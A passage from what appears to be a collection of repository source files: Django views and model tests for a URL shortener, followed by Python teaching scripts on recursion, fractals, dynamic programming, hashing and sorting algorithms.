return HttpResponseRedirect(reverse('blocks'))
def get_context_data(self, request):
_question = Block.objects.select_related().all()
paginator = Paginator(_question, 50)
page = request.GET.get('page')
try:
blocks = paginator.page(page)
except PageNotAnInteger:
blocks = paginator.page(1)
except (EmptyPage, InvalidPage):
blocks = paginator.page(paginator.num_pages)
cxt = {
'blocks': blocks,
'materials': Material.objects.all()
}
return cxt
class BlockListTemplateView(LoginRequiredMixin, ListView):
template_name = 'block/list.html'
model = Block
```
|
{
"source": "jesuejunior/urlreduce",
"score": 2
}
|
#### File: reducer/tests/test_model.py
```python
from unittest import TestCase
from django.contrib.auth.models import User
from django.db import models
from reducer.models import Link, Owner
class LinkModelTest(TestCase):
def test_url_hash(self):
link = Link._meta.get_field_by_name('url_hash')[0]
self.assertEquals(link.__class__, models.CharField)
self.assertEquals(link.max_length, 255)
self.assertTrue(link.null)
self.assertTrue(link.blank)
self.assertTrue(link.unique)
def test_user(self):
link = Link._meta.get_field_by_name('user')[0]
self.assertEquals(link.__class__, models.ForeignKey)
def test_url(self):
link = Link._meta.get_field_by_name('url')[0]
self.assertEquals(link.__class__, models.URLField)
def test_dt_created(self):
link = Link._meta.get_field_by_name('dt_created')[0]
self.assertEquals(link.__class__, models.DateTimeField)
self.assertTrue(link.auto_now_add)
class OwnerModelTest(TestCase):
def test_link(self):
owner = Owner._meta.get_field_by_name('link')[0]
self.assertEquals(owner.__class__, models.ForeignKey)
def test_owners(self):
owner = Owner._meta.get_field_by_name('link')[0]
self.assertEquals(owner.__class__, models.ForeignKey)
class UseruModelTest(TestCase):
def test_username(self):
user = User._meta.get_field_by_name('username')[0]
self.assertEquals(user.max_length, 30)
self.assertTrue(user.unique)
```
#### File: urlreduce/reducer/views.py
```python
import urllib2
from django.core.paginator import Paginator, EmptyPage, InvalidPage, PageNotAnInteger
from django.template.response import TemplateResponse
from django.views.defaults import page_not_found
from common.login_required_mixin import LoginRequiredMixin
from reducer.forms import ReduceURLForm
from django.views.generic import View, TemplateView, RedirectView
from reducer.models import Link, Owner
class HomeTemplateView(View):
template_name = 'home.html'
def get(self, request, *args, **kwargs):
cxt = self.get_context_data()
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
**kwargs
)
def post(self, request, *args, **kwargs):
cxt = self.get_context_data()
req = request.POST
authenticated = request.user.is_authenticated()
if authenticated:
req = req.copy()
req[u'user'] = request.user.pk
form = ReduceURLForm(req)
        # Do not allow registering a duplicate URL (saves disk/memory)
if form.is_valid():
link = Link.objects.filter(url=form.cleaned_data['url'])
link = link[0] if link else None
if not link:
link = form.save()
if authenticated:
owner, created = Owner.objects.get_or_create(link=link)
owner.owners.add(request.user)
cxt['link'] = link.to_dict()
else:
cxt['link'] = '500'
        # TODO - If the URL is already registered, the owner does not change and the existing URL only
        # TODO - shows up for the first person; think about how to fix this
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
**kwargs
)
def get_context_data(self, **kwargs):
cxt = {}
cxt['form_url'] = ReduceURLForm
return cxt
class MyLinksTemplateView(LoginRequiredMixin, TemplateView):
template_name = 'my-links.html'
def get(self, request, *args, **kwargs):
links = Link.objects.filter(owner__owners=request.user)
paginator = Paginator(links, 10)
page = request.GET.get('page')
try:
links = paginator.page(page)
except PageNotAnInteger:
links = paginator.page(1)
except (EmptyPage, InvalidPage):
links = paginator.page(paginator.num_pages)
cxt = {'links': links}
return self.render_to_response(cxt)
class GoToRedirectView(RedirectView):
def get(self, request, *args, **kwargs):
url_hash = kwargs.get('url_hash')
try:
link = Link.objects.decode(url_hash)
self.url = urllib2.unquote(link)
return super(GoToRedirectView, self).get(request, *args, **kwargs)
except Link.DoesNotExist:
return page_not_found(request)
```
|
{
"source": "je-suis-tm/recursion-and-dynamic-programming",
"score": 4
}
|
#### File: je-suis-tm/recursion-and-dynamic-programming/coin change recursion.py
```python
def coin_change(num,choice):
#base case
if num==0:
return 1
#prevent stack overflow
if num<0:
return 0
output=0
#iterate through cases of exclusion
for i in range(len(choice)):
#case of inclusion
include=coin_change(num-choice[i],choice)
exclude=0
#case of exclusion
if i>=1:
exclude=coin_change(num,choice[:i])
#two sub problems merge into a big one
output=include+exclude
return output
# In[3]:
coin_change(4,[1,2,3])
```
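Note that `output` is reassigned on every pass of the loop, so only the final pass (include the last coin in `choice` versus exclude it) determines the returned value; the earlier passes are recomputed and discarded, which adds to the cost of plain recursion here. The call above returns 4 because the combinations of 1, 2 and 3 that sum to 4 are 1+1+1+1, 1+1+2, 2+2 and 1+3. A couple of checks consistent with that reading (added for illustration, not part of the original script):
```python
assert coin_change(4, [1, 2, 3]) == 4   # 1+1+1+1, 1+1+2, 2+2, 1+3
assert coin_change(5, [1, 2, 3]) == 5   # 1+1+1+1+1, 1+1+1+2, 1+2+2, 1+1+3, 2+3
```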
#### File: je-suis-tm/recursion-and-dynamic-programming/fibonacci with memoization.py
```python
global mem
mem={1:1,2:1}
import datetime as dt
#fib(n) is recursion with memory
#everytime we do the calculation, we store it in the dictionary
#i denote the key as the n th fibonacci number
#the value as the number itself
#if we can find the key in dictionary
#we simply return the value
#if not, we append the dictionary then return the value
def fib(n):
if n in mem:
return mem[n]
else:
mem[n]=(fib(n-1)+fib(n-2))
return mem[n]
#this is the fibonacci recursion function without memory
#it is basically algorithm 101 for any coding language
def f(n):
if n==1:
return 1
elif n==2:
return 1
else:
return f(n-1)+f(n-2)
#i calculate how long these two functions take
#print out the comparison
def compare(n):
t1=dt.datetime.now()
f(n)
t2=dt.datetime.now()
print('recursion: ',t2-t1)
t1=dt.datetime.now()
fib(n)
t2=dt.datetime.now()
print('recursion with memory: ',t2-t1)
compare(20)
```
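For comparison, the standard library offers the same trade-off without a hand-rolled dictionary; a small sketch (not part of the original script) using `functools.lru_cache`:
```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib_cached(n):
    # identical recurrence; the decorator stores results much like `mem` above
    if n <= 2:
        return 1
    return fib_cached(n - 1) + fib_cached(n - 2)

print(fib_cached(20))   # 6765, computed in linear rather than exponential time
```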
#### File: je-suis-tm/recursion-and-dynamic-programming/hanoi tower.py
```python
def hanoi(n,a,b,c):
#rule states that each time we can only move one element
#so when the recursion reaches to base case 1
#we print the movement of elements from a to c
if n==1:
print(a,'-',c)
return
#for the general case
#the first step is to move everything above the base case from column a to column b
#note that we set print a to c when n reaches one
#so in this case we reorder the function, replace c with column b where elements actually move towards
hanoi(n-1,a,c,b)
#the second step is to move the base case from column a to column c
#we are only moving base case, thats why n=1
hanoi(1,a,b,c)
#final step would be move everything above base case from column b to column c
hanoi(n-1,b,a,c)
# In[3]:
hanoi(4,'a','b','c')
# the best explanation should be
# https://www.python-course.eu/towers_of_hanoi.php
```
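Each call for n disks issues two recursive calls for n-1 disks plus one single-disk move, so the printout above contains exactly 2**n - 1 lines (15 for n=4). A quick check of that count, added for illustration:
```python
import io, contextlib
buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    hanoi(4, 'a', 'b', 'c')
assert len(buf.getvalue().splitlines()) == 2**4 - 1   # 15 moves
```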
#### File: je-suis-tm/recursion-and-dynamic-programming/jerusalem cross.py
```python
import matplotlib.pyplot as plt
# In[2]:
#compute euclidean distance
def euclidean_distance(point1,point2):
return ((point1[0]-point2[0])**2+(point1[1]-point2[1])**2)**0.5
# In[3]:
#recursively plot jerusalem cross
#it kinda looks like flag of georgia (n=2)
#i mean the eurasian country not a yankee state
#i call it jerusalem cross but it is aka cross menger square,jerusalem square
#it is a 2d version of jerusalem cube
#a good reference to jerusalem cube
# https://robertdickau.com/jerusalemcube.html
#a good understanding of sierpiński carpet is helpful as well
# https://github.com/je-suis-tm/recursion-and-dynamic-programming/blob/master/sierpi%C5%84ski%20carpet.py
#do not confuse it with quadratic cross,which creates new crosses from the tips
# https://onlinemathtools.com/generate-quadratic-cross-fractal
#or fibonacci snowflakes,which is more like koch snowflake
# http://www.slabbe.org/Publications/2011-fibo-snowflakes.pdf
#or vicsek fractal,which is more similar to crosslet cross
# https://en.wikipedia.org/wiki/Vicsek_fractal
def jerusalem_cross(top_left,top_right,bottom_left,bottom_right,n):
if n<=0:
return
else:
#compute the length
length=euclidean_distance(top_left,top_right)
#create the cross
plt.fill_between(
[top_left[0]+length*(2**0.5-1),top_right[0]-length*(2**0.5-1)],
[bottom_left[1]+length*(2**0.5-1)**2,bottom_left[1]+length*(2**0.5-1)**2],
[top_left[1]-length*(2**0.5-1)**2,top_left[1]-length*(2**0.5-1)**2],
color='k')
plt.fill_between(
[top_left[0]+length*(2**0.5-1)**2,top_right[0]-length*(2**0.5-1)**2],
[bottom_left[1]+length*(2**0.5-1),bottom_left[1]+length*(2**0.5-1)],
[top_left[1]-length*(2**0.5-1),top_left[1]-length*(2**0.5-1)],
color='k')
#top left corner recursion
jerusalem_cross(top_left,(top_left[0]+length*(2**0.5-1),top_left[1]),
(top_left[0],top_left[1]-length*(2**0.5-1)),
(top_left[0]+length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)),n-1)
#top right corner recursion
jerusalem_cross((top_right[0]-length*(2**0.5-1),top_left[1]),top_right,
(top_right[0]-length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)),
(top_right[0],top_left[1]-length*(2**0.5-1)),n-1)
#bottom left corner recursion
jerusalem_cross((bottom_left[0],bottom_left[1]+length*(2**0.5-1)),
(bottom_left[0]+length*(2**0.5-1),
bottom_left[1]+length*(2**0.5-1)),
bottom_left,
(bottom_left[0]+length*(2**0.5-1),bottom_left[1]),n-1)
#bottom right corner recursion
jerusalem_cross((bottom_right[0]-length*(2**0.5-1),
bottom_right[1]+length*(2**0.5-1)),
(bottom_right[0],
bottom_right[1]+length*(2**0.5-1)),
(bottom_right[0]-length*(2**0.5-1),
bottom_right[1]),
bottom_right,n-1)
#top mid corner recursion
jerusalem_cross((top_left[0]+length*(2**0.5-1),top_left[1]),
(top_right[0]-length*(2**0.5-1),top_left[1]),
(top_left[0]+length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)**2),
(top_right[0]-length*(2**0.5-1),
top_left[1]-length*(2**0.5-1)**2),n-2)
#bottom mid corner recursion
jerusalem_cross((bottom_left[0]+length*(2**0.5-1),
bottom_left[1]+length*(2**0.5-1)**2),
(bottom_right[0]-length*(2**0.5-1),
bottom_left[1]+length*(2**0.5-1)**2),
(bottom_left[0]+length*(2**0.5-1),
bottom_left[1]),
(bottom_right[0]-length*(2**0.5-1),
bottom_left[1]),n-2)
#left mid corner recursion
jerusalem_cross((bottom_left[0],
top_left[1]-length*(2**0.5-1)),
(bottom_left[0]+length*(2**0.5-1)**2,
top_left[1]-length*(2**0.5-1)),
(bottom_left[0],bottom_left[1]+length*(2**0.5-1)),
(bottom_left[0]+length*(2**0.5-1)**2,
bottom_left[1]+length*(2**0.5-1)),n-2)
#right mid corner recursion
jerusalem_cross((bottom_right[0]-length*(2**0.5-1)**2,
top_right[1]-length*(2**0.5-1)),
(bottom_right[0],
top_right[1]-length*(2**0.5-1)),
(bottom_right[0]-length*(2**0.5-1)**2,
bottom_right[1]+length*(2**0.5-1)),
(bottom_right[0],bottom_right[1]+length*(2**0.5-1)),
n-2)
# In[4]:
#initialize
top_left=(0,0)
top_right=(1,0)
bottom_left=(0,-1)
bottom_right=(1,-1)
n=5
# In[5]:
#viz
ax=plt.figure(figsize=(10,10))
jerusalem_cross(top_left,top_right,bottom_left,bottom_right,n)
plt.xlim(top_left[0],top_right[0])
plt.ylim(bottom_right[1],top_left[1],)
plt.axis('off')
plt.show()
```
#### File: je-suis-tm/recursion-and-dynamic-programming/koch snowflake.py
```python
import matplotlib.pyplot as plt
# In[2]:
#simple solution to get coefficients of the equation
def get_line_params(x1,y1,x2,y2):
slope=(y1-y2)/(x1-x2)
intercept=y1-slope*x1
return slope,intercept
# In[3]:
#compute euclidean distance
def euclidean_distance(point1,point2):
return ((point1[0]-point2[0])**2+(point1[1]-point2[1])**2)**0.5
# In[4]:
#standard solution to quadratic equation
def solve_quadratic_equation(A,B,C):
x1=(-B+(B**2-4*A*C)**0.5)/(2*A)
x2=(-B-(B**2-4*A*C)**0.5)/(2*A)
return [x1,x2]
# In[5]:
#analytic geometry to compute target datapoints
def get_datapoint(pivot,measure,length,direction='inner'):
#for undefined slope
if pivot[0]==measure[0]:
y1=pivot[1]+length
y2=pivot[1]-length
x1=pivot[0]
x2=pivot[0]
#for general cases
else:
#get line equation
slope,intercept=get_line_params(pivot[0],pivot[1],
measure[0],measure[1],)
#solve quadratic equation
A=1
B=-2*pivot[0]
C=pivot[0]**2-length**2/(slope**2+1)
x1,x2=solve_quadratic_equation(A,B,C)
#get y from line equation
y1=slope*x1+intercept
y2=slope*x2+intercept
if direction=='inner':
#take the one between pivot and measure points
datapoint=min([(x1,y1),(x2,y2)],
key=lambda x:euclidean_distance(x,measure))
else:
#take the one farther away from measure points
datapoint=max([(x1,y1),(x2,y2)],
key=lambda x:euclidean_distance(x,measure))
return datapoint
# In[6]:
#recursively compute the coordinates of koch curve data points
#to effectively connect the data points,the best choice is to use turtle
#it would be too difficult to connect the dots via analytic geometry
def koch_snowflake(base1,base2,base3,n):
#base case
if n==0:
return
else:
#find mid point
#midpoint between base1 and base2 has to satisfy two conditions
#it has to be on the same line as base1 and base2
#assume this line follows y=kx+b
#the midpoint is (x,kx+b)
#base1 is (α,kα+b),base2 is (δ,kδ+b)
#the euclidean distance between midpoint and base1 should be
#half of the euclidean distance between base1 and base2
#(x-α)**2+(kx+b-kα-b)**2=((α-δ)**2+(kα+b-kδ-b)**2)/4
#apart from x,everything else in the equation is constant
#this forms a simple quadratic solution to get two roots
#one root would be between base1 and base2 which yields midpoint
#and the other would be farther away from base2
#this function solves the equation via (-B+(B**2-4*A*C)**0.5)/(2*A)
#alternatively,you can use scipy.optimize.root
#the caveat is it does not offer both roots
#a wrong initial guess could take you to the wrong root
midpoint=get_datapoint(base1,base2,euclidean_distance(base1,base2)/2)
#compute the top point of a triangle
#the computation is similar to midpoint
#the euclidean distance between triangle_top and midpoint should be
#one third of the distance between base3 and midpoint
triangle_top=get_datapoint(midpoint,base3,
euclidean_distance(midpoint,base3)/3,
direction='outer')
#two segment points divide a line into three equal parts
#the computation is almost the same as midpoint
#the euclidean distance between segment1 and base1
#should be one third of the euclidean distance between base2 and base1
segment1=get_datapoint(base1,base2,euclidean_distance(base1,base2)/3)
segment2=get_datapoint(base2,base1,euclidean_distance(base1,base2)/3)
#compute the nearest segment point of the neighboring line
segment_side_1=get_datapoint(base1,base3,euclidean_distance(base1,base3)/3)
segment_side_2=get_datapoint(base2,base3,euclidean_distance(base2,base3)/3)
#recursion
yield [segment1,segment2,triangle_top]
yield from koch_snowflake(base1,segment1,segment_side_1,n-1)
yield from koch_snowflake(segment1,triangle_top,segment2,n-1)
yield from koch_snowflake(triangle_top,segment2,segment1,n-1)
yield from koch_snowflake(segment2,base2,segment_side_2,n-1)
# In[7]:
#set data points
point1=(0,0)
point2=(3,0)
point3=(3/2,3/2*(3**0.5))
#due to python floating point arithmetic
#a lot of data points could go wrong during the calculation
#unfortunately there is no panacea to this malaise
#unless we plan to use decimal package all the time
#when the depth of snowflake reaches 1
#one of the data points reach -1.1102230246251565e-16 on x axis
#when the depth of snowflake reaches 6
#we end up with complex root and things go wrong
n=4
# In[8]:
#collect coordinates
arr=list(koch_snowflake(point1,point2,point3,n))+list(
koch_snowflake(point3,point1,point2,n))+list(
koch_snowflake(point2,point3,point1,n))+[(point1,point2,point3)]
coordinates=[j for i in arr for j in i]
# In[9]:
#viz
#visually u can tell some of the data points are miscalculated
#purely caused by floating point arithmetic
ax=plt.figure(figsize=(5,5))
plt.scatter([i[0] for i in coordinates],
[i[1] for i in coordinates],s=0.5)
plt.axis('off')
plt.show()
# In[10]:
#turtle version of koch snowflake
# https://www.geeksforgeeks.org/koch-curve-koch-snowflake/
```
#### File: je-suis-tm/recursion-and-dynamic-programming/palindrome checker 4 methods.py
```python
import re
def f(n):
#this is the base case, when string is empty
#we just return empty
if n=='':
return n
else:
return n[-1]+f(n[:-1])
def check(n):
#this part is the regular expression to get only characters
#and format all of em into lower cases
c1=re.findall('[a-zA-Z0-9]',n.lower())
c2=re.findall('[a-zA-Z0-9]',(f(n)).lower())
if c1==c2:
return True
else:
return False
#alternatively, we can use deque
#we pop from both sides to see if they are equal
#if not return false
#note that the length of string could be an odd number
#we wanna make sure the pop should take action while length of deque is larger than 1
from collections import deque
def g(n):
c=re.findall('[a-zA-Z0-9]',n.lower())
de=deque(c)
while len(de) >=1:
if de.pop()!=de.popleft():
return False
return True
#or we can use non recursive slicing
def h(n):
c=re.findall('[a-zA-Z0-9]',n.lower())
if c[::-1]==c:
return True
else:
return False
#or creating a new list
#using loop to append new list from old list s popped item
def i(n):
c=re.findall('[a-zA-Z0-9]',n.lower())
d=[]
for i in range(len(c)):
d.append(c.pop())
c=re.findall('[a-zA-Z0-9]',n.lower())
if d==c:
return True
else:
return False
print(check('Evil is a deed as I live!'))
print(g('Evil is a deed as I live!'))
print(h('Evil is a deed as I live!'))
print(i('Evil is a deed as I live!'))
#for time and space complexity, python non recursive slicing wins
```
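A rough timing sketch supporting the closing remark (exact numbers depend on the machine; this is illustrative only):
```python
import timeit
phrase = 'Evil is a deed as I live!'
for fn in (check, g, h, i):
    print(fn.__name__, timeit.timeit(lambda: fn(phrase), number=10000))
```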
#### File: je-suis-tm/recursion-and-dynamic-programming/stock trading dynamic programming.py
```python
def stock_trading(prices):
#initialize the profit at zero
profit=[0 for _ in range(len(prices))]
#initialize maximum price with the close price
max_price=prices[-1]
#reverse order iteration
for i in range(len(prices)-2,-1,-1):
#update the maximum price to compute the maximum profit
if prices[i]>max_price:
max_price=prices[i]
#two scenarios to get the maximum profit
#either the previous iteration is larger
#or this round of iteration
profit[i]=max(profit[i+1],max_price-prices[i])
#initialize minimum price with the open price
min_price=prices[0]
#second round of iteration
for i in range(1,len(prices)):
#update the minimum price to compute the maximum profit
if prices[i]<min_price:
min_price=prices[i]
#two scenarios to get the maximum profit
#either the previous iteration is larger
#or this round of iteration plus the result from single transaction
profit[i]=max(profit[i-1],profit[i]+prices[i]-min_price)
return profit[-1]
# In[3]:
stock_trading([10,22,5,75,65,80])
# In[4]:
stock_trading([2,30,15,10,8,25,80])
# In[5]:
stock_trading([100,30,15,10,8,25,80])
# In[6]:
stock_trading([90,70,35,11,5])
```
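The routine computes the best profit from at most two non-overlapping buy/sell transactions: the backward pass stores the best single transaction available from day i onward, and the forward pass adds the best transaction that ends on day i. For `[10, 22, 5, 75, 65, 80]` that is (22 - 10) + (80 - 5) = 87. Worked checks consistent with that reading:
```python
assert stock_trading([10, 22, 5, 75, 65, 80]) == 87   # (22 - 10) + (80 - 5)
assert stock_trading([90, 70, 35, 11, 5]) == 0        # prices only fall, so never trade
```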
|
{
"source": "je-suis-tm/search-and-sort",
"score": 4
}
|
#### File: je-suis-tm/search-and-sort/hash search.py
```python
def genr_hash(raw_list):
hashtable={0:'',1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:''}
for i in raw_list:
#check if there is already a value stored under that hash value
#if no, its fine
#if yes, we create a list and append the collision
if hashtable[i%11]=='':
hashtable[i%11]=i
else:
#note that we append both values into the list
temp=[]
temp.append(hashtable[i%11])
temp.append(i)
hashtable[i%11]=temp
return hashtable
#now its the search part
#we just apply hash function on target and get hash value
#we look up the hash value in dictionary
def hashsearch(target,raw_list):
hashtable=genr_hash(raw_list)
temp=hashtable[target%11]
#we gotta check if there is collision under this hash value
#if dictionary keeps a list under this hash value
#we have to further check the list
if type(temp)==list:
if target in temp:
return True
else:
return False
elif temp==target:
return True
else:
return False
# In[2]:
print(hashsearch(55,[21,55,89,67]))
# In[3]:
#linear probing
#when collision occurs, we try to find the next empty slot to store it
#it sounds reasonable but it is also trouble
#what if we run through the whole dictionary
#and there is no slot?
#we can choose to drop the values
#or we can reset the hash function or expand the dictionary
#in the best case, it is faster than chaining
#in the worst case, it is slower
#note that i create a temporary list to append collision items
def genr_hash(raw_list):
hashtable={0:'',1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:''}
temp=[]
badhash=[]
for i in raw_list:
if hashtable[i%11]=='':
hashtable[i%11]=i
else:
temp.append(i)
#the first loop is to make sure every collision will be popped
while len(temp)>0:
pop=temp.pop()
j=pop%11
#c is a counter
#in the second loop
#c is to determine whether we have gone through the entire list
c=0
while c<10:
#when the next one isnt empty, we keep iterating
#when j exceeds ten, we return it to 0
#alternatively we can use mod eleven %11
if hashtable[j]!='':
j+=1
if j>10:
j=0
else:
hashtable[j]=pop
#after the value is assigned
#we clear the value
pop=''
c=10
c+=1
#the reason of checking this temporary variable called pop
#is to make sure that we will print out those items which didnt get assigned
if pop!='':
badhash.append(pop)
pop=''
#if the hashing is imperfect, we print out badhash list
if len(badhash)>0:
print(badhash)
return hashtable
#the search part is very similar to the chaining one
def hashsearch(target,raw_list):
hashtable=genr_hash(raw_list)
temp=target%11
c=0
if hashtable[temp]==target:
return True
else:
#when we cannot find the value at hash value
#we begin our linear probing
#its the same process as the hash function
#except we only need to return T/F
while c<10:
if hashtable[temp]!=target:
temp+=1
if temp>10:
temp=0
else:
return True
c+=1
return False
# In[4]:
print(hashsearch(67,[21,55,89,67,12,12]))
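#an added illustration (not part of the original notebook): with linear probing the colliding
#values simply slide into the next free slots, so the table keeps single values instead of lists
print(genr_hash([21,55,89,67,12,12]))
#here 89 keeps slot 1, the two 12s land in slots 2 and 3, and 67 ends up in slot 4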
# In[5]:
#quadratic probing
#it sounds math intensive with the word quadratic
#as a matter of fact, it is quite simple
#we just replace the add one method with add quadratic values
#the difference is that we need an extra variable to store quadratic value
def genr_hash(raw_list):
hashtable={0:'',1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:''}
temp=[]
badhash=[]
for i in raw_list:
if hashtable[i%11]=='':
hashtable[i%11]=i
else:
temp.append(i)
while len(temp)>0:
pop=temp.pop()
j=pop%11
c=0
#x is where we store quadratic value
x=1
while c<10:
if hashtable[j]!='':
#the loop is basically the same as linear probing
#except we add quadratic value
#note that its quite difficult
#to determine whether we have been through the entire list
#so i still set counter limit at 10
j+=x**2
if j>10:
#note that i use mod eleven %11 when iteration exceeds hash table size
j=j%11
else:
hashtable[j]=pop
pop=''
c=10
c+=1
x+=1
if pop!='':
badhash.append(pop)
pop=''
if len(badhash)>0:
print(badhash)
return hashtable
#the search is basically the same as linear probing
#except linear part is substituted with quadratic
def hashsearch(target,raw_list):
hashtable=genr_hash(raw_list)
temp=target%11
c=0
x=1
if hashtable[temp]==target:
return True
else:
while c<10:
if hashtable[temp]!=target:
temp+=x**2
if temp>10:
temp=temp%11
else:
return True
c+=1
x+=1
return False
# In[6]:
print(hashsearch(67,[21,55,89,67,12,12,12,12,12,12,12,12,12,12,78]))
#we get False in the end
#its quite interesting that for the same hash value 67,12,78
#we can store 78 in hash table but not 67
#because we use pop function
#the list is processed in a reversed order
#78 and 12 are processed earlier than 67
#quadratic probing doesnt iterate through all slots
#all empty slots we can iterate have been occupied by the time we reach 67
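#an added illustration of the remark above (not part of the original notebook): starting from
#hash value 1 the quadratic probe sequence starts repeating itself and, within the ten allowed
#attempts, never reaches slots such as 3, 5, 8 or 10
j,x,visited=1,1,[1]
for _ in range(10):
    j=(j+x**2)%11
    visited.append(j)
    x+=1
print(visited)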
```
#### File: je-suis-tm/search-and-sort/quick sort.py
```python
import random as rd
#okay. the epic one!
#quick sort, mmm, not so quick
#the idea of quick sort is to be the quickest
#first thing first, we gotta pick a pivot number for the list
#normally, people use the first element as pivot number
#however, we may encounter a case that the first element is the largest or the smallest
#that would make our sorting a total failure
#here i use the median of 3 approach
#take the first, the last and the one in the middle
#and get the median of the three
#we use the median as a pivot number
#after that, we do the same trick as merge sort
#we have a left index and a right index
#we do traversal on both indices
#say the left index comes from the left part
#the right index comes from the right part
#we compare two elements with pivot number at the same time
#there are four cases assuming that we dont have any duplicate values in the list
#first case, left is larger than pivot, right is smaller than pivot
#so we swap both
#second case, left is larger than pivot, right is larger than pivot as well
#we freeze the left, and move right side index one step backwards
#right=right-1
#then if left is larger than pivot, right is smaller than pivot
#we go back to the first case
#if it is still the second case, we repeat this procedure until we move to first case
#or left and right indices cross, we stop the sorting
#third case, left is smaller than pivot, right is smaller than pivot
#it is the opposite case of the second case
#fourth case, left is smaller than pivot, right is larger than pivot
#great, we do nothing but moving both indices closer to the centre
#these are four basic scenarios when we do both traversals
#when left and right indices cross, we stop the sorting
#and we insert the pivot number in where indices cross
#the next step is just like merge sort
#we divide the list in two halves (excluding the pivot number)
#we perform the same trick on both halves recursively
#until we reach the base case when there are only two elements in the list
#we sort those two elements with simple comparison
def quick_sort(target):
#the first step is to get a pivot number
#it only works on list with more than two elements
#otherwise there is no point of getting a pivot number
if len(target)>2:
#we take three elements, first, last and middle
#we get a new list
test=[target[0],target[len(target)//2],target[-1]]
#this is how we get the median
#there are only 3 elements
#so the sum of indices is 3
#0+1+2
#all we need to do is to exclude the maximum and the minimum indices
#we get the median s index
pivotindex=3-test.index(max(test))-test.index(min(test))
#this part is very confusing
#mostly due to simultaneous swap
#it is merely swapping
#if the median number index is 0
#we do nothing
#cuz we initialize pivot number at index 0 later
#if not
#we make a swap
#we use slicing method to get the index of the median in original list
#we use that index to get the actual element
#then we swap it with element 0
if pivotindex!=0:
target[target.index(test[pivotindex])] , target[0] = target[0] , target[target.index(test[pivotindex])]
#with the previous swap, we initialize pivot number at position 0
pivot=target[0]
#first index is at 1, cuz we wanna exclude pivot number
left=1
#last index is at the end of the list
right=len(target)-1
#here comes the real deal
#when left and right dont cross
#excluding a case when two indices equal to each other
while left-1<right:
#case 1
if target[left]>pivot and target[right]<pivot:
target[left],target[right]=target[right],target[left]
left-=1
#case 3
if target[left]<pivot and target[right]<pivot:
left+=1
#case 2
if target[left]>pivot and target[right]>pivot:
right-=1
#case 4
if target[left]<pivot and target[right]>pivot:
left+=1
right-=1
#when left and right indices cross
#we pop the pivot number and insert it at position left-1
#when indices cross, we are one step after the input list is sorted
#therefore, we insert pivot at left-1 instead of left
if left>=right:
target.insert(left-1,target.pop(0))
#the recursive part
#we do the same trick on two halves
target[:left-1]=quick_sort(target[:left-1])
target[left:]=quick_sort(target[left:])
#the base case
#when we are left with two elements in a sublist
#we just compare and return in reverse order
    #you might ask, what about one element
    #well, we dont have to do anything so no code is needed
if len(target)==2:
if target[0]>target[1]:
return target[::-1]
return target
#there is a constraint for quick sort
#duplicate values would jeopardize everything we have built
#to solve that issue, we must amend the criteria for selecting pivot number
#for simplicity, i remove duplicates from our test list
#to handle duplicate values which might affect pivot
#my idea is to insert an extra if function
#if elements not at position 0 equal to pivot
#we create a temporary list to collect them
#when we plan to insert pivot
#we insert the temporary list to the full list
#since we have recursive functions
#this approach to get a quick sort
#is kinda different from my textbook
#to see the alternative version
#please see the link below
# http://interactivepython.org/runestone/static/pythonds/SortSearch/TheQuickSort.html
for i in range(100):
target=rd.sample([i for i in range(1000)],100)
if quick_sort(target)!=sorted(target):
print('Erreur')
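#an added sketch for comparison (not the original author's code): a compact recursive quick sort
#that keeps the elements equal to the pivot together, so duplicate values need no special handling
def quick_sort_simple(target):
    if len(target)<=1:
        return target
    pivot=target[len(target)//2]
    smaller=[x for x in target if x<pivot]
    equal=[x for x in target if x==pivot]
    larger=[x for x in target if x>pivot]
    return quick_sort_simple(smaller)+equal+quick_sort_simple(larger)
for i in range(100):
    target=rd.sample([i for i in range(1000)],100)
    if quick_sort_simple(target)!=sorted(target):
        print('Erreur')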
```
#### File: je-suis-tm/search-and-sort/shaker sort.py
```python
import random as rd
# In[2]:
#shaker sort, or cocktail sort, or cocktail shaker sort
#in this script, we will call it cocktail shaker sort
#with so many names, it is merely a variation of bubble sort
#go the link below to check out the details of bubble sort
# https://github.com/je-suis-tm/search-and-sort/blob/master/bubble,%20selection%20and%20insertion%20sort.py
#bubble sort repeatedly takes comparison from one side to the other
#usually left to right, takes n*(n-1) steps, assuming n is the size
#cocktail shaker sort has a similar mechanism
#except it compares its elements from left to right
#then right to left, later left to right
#the process looks like a cocktail shaker (not really)
#that is how the sort gets its name
#in theory, for a partially sorted list
#cocktail shaker sort takes less time than a bubble sort
def cocktail_shaker_sort(target):
#we use left and right to define each round's start and end point
left=0
right=len(target)-1
swap=True
while left<right or not swap:
swap=False
#as usual, we start from left to right
for i in range(left+1,right+1):
if target[i]<target[i-1]:
target[i],target[i-1]=target[i-1],target[i]
swap=True
right-=1
#swap is the key to increase the efficiency
#once there is no swap happened in the loop
#we can conclude the target list is fully sorted
if not swap:
return target
swap=False
#then right to left
for j in range(right,left,-1):
if target[j]<target[j-1]:
target[j],target[j-1]=target[j-1],target[j]
swap=True
left+=1
return target
# In[3]:
for i in range(100):
target=rd.sample([i for i in range(1000)],100)
if cocktail_shaker_sort(target)!=sorted(target):
print('Erreur')
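# In[4]:
#an added illustration (not part of the original notebook): on an almost sorted list the swap
#flag lets cocktail shaker sort stop after a couple of passes instead of scanning n times
almost_sorted=list(range(100))
almost_sorted[0],almost_sorted[1]=almost_sorted[1],almost_sorted[0]
print(cocktail_shaker_sort(almost_sorted)==list(range(100)))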
```
#### File: je-suis-tm/search-and-sort/shell sort.py
```python
import random as rd
def insertion_sort(target):
for i in range(1,len(target)):
val=target[i]
j=i
while val<target[j-1] and j!=0:
target[j]=target[j-1]
j-=1
target[j]=val
return target
#shell sort is a variation of insertion sort
#slicing method [a::b] is the key
#we gotta cut the original list into a few small groups
#assume we have a list of n elements
#the first step, we do b=n//a, we get a few sublists by [a::b]
#we apply insertion sort on those sublists and concatenate
#next, we do b=b//a, and we obtain a few new sublists by [a::b]
#we apply insertion sort on new sublists and concatenate
#we keep using //a method and do insertion sort and concatenate
